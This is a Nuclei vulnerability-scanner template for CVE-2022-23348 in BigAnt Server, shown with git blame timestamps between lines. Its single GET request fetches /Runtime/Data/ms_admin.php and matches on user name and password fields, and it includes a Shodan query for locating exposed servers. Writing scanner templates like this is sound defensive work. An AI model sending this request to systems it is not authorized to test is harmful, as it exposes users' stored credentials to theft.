nuclei-templates/http/cves/2022/CVE-2022-23348.yaml

51 lines
1.3 KiB
YAML
Raw Normal View History

2022-08-05 05:58:38 +00:00
id: CVE-2022-23348
info:
name: BigAnt Server 5.6.06 - Improper Access Control
2022-08-05 05:58:38 +00:00
author: arafatansari
severity: medium
description: |
BigAnt Server 5.6.06 is susceptible to improper access control. The software utililizes weak password hashes. An attacker can craft a password hash and thereby possibly possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-08-05 05:58:38 +00:00
reference:
- https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23348
- http://bigant.com
- https://nvd.nist.gov/vuln/detail/CVE-2022-23348
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-23348
cwe-id: CWE-916
cpe: cpe:2.3:a:bigantsoft:bigant_server:*:*:*:*:*:*:*:*
epss-score: 0.00337
2022-08-05 05:58:38 +00:00
metadata:
max-request: 1
2022-08-05 05:58:38 +00:00
shodan-query: http.html:"bigant"
verified: "true"
2022-08-06 18:05:21 +00:00
tags: cve,cve2022,bigant,unauth,exposure
2022-08-05 05:58:38 +00:00
http:
2022-08-05 05:58:38 +00:00
- method: GET
path:
- "{{BaseURL}}/Runtime/Data/ms_admin.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-08-05 06:37:11 +00:00
- '"user_name";'
- '"user_pwd";'
- '"user_id";'
condition: and
2022-08-05 05:58:38 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by md on 2023/02/03